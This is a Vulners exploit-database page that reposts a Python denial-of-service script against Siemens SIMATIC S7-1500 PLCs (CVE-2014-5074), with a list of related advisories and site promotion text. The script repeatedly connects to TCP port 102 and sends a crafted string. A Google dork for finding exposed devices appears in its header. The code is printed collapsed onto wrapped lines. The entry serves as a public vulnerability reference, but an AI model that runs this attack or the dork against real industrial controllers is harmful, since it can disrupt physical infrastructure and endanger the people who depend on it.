Lucene search
+L

Siemens SIMATIC S7-1500 CPU - Remote Denial of Service

🗓️ 22 May 2018 00:00:00Reported by t4rkd3vilzType 
exploitpack
 exploitpack
👁 81 Views

Siemens SIMATIC S7-1500 CPU vulnerable to remote denial of service prior to version 1.6.

Related
Code
ReporterTitlePublishedViews
Family
zdt
Siemens SIMATIC S7-1500 CPU - Remote Denial of Service Exploit
23 May 201800:00
zdt
Tenable Nessus
Siemens SIMATIC S7 1500 Firmware < 1.6.0 DoS Vulnerability
21 May 201900:00
nessus
Tenable Nessus
Siemens Simatic Unspecified Vulnerability
8 Nov 201900:00
nessus
Tenable Nessus
Siemens SIMATIC S7-1500 Denial of Service (CVE-2014-5074)
7 Feb 202200:00
nessus
CVE
CVE-2014-5074
17 Aug 201423:00
cve
Cvelist
CVE-2014-5074
17 Aug 201423:00
cvelist
Exploit DB
Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
22 May 201800:00
exploitdb
ICS
Siemens SIMATIC S7-1500 CPU Denial of Service
17 May 201406:00
ics
NVD
CVE-2014-5074
17 Aug 201423:55
nvd
Prion
Code injection
17 Aug 201423:55
prion
Rows per page
# Exploit Title: Siemens SIMATIC S7-1500 CPU - Remote Denial of Service
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-22
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1500 CPU all versions before V1.6
# Tested on: Kali Linux
# CVE: CVE-2014-5074


#!/usr/bin/python

import socket import sys from time import sleep if
len(sys.argv) != 2: print "Usage: exploit.py <ip>" sys.exit(0) for x in
range(1,50): s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#vulnerable TCP port 102 connect=s.connect((str(sys.argv[1]), 102))
s.send('some evil string \r\n\n') print "bufff " + str(x) + " sent...\n"
result=s.recv(1024) print result s.close() sleep(7)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 May 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.09696
81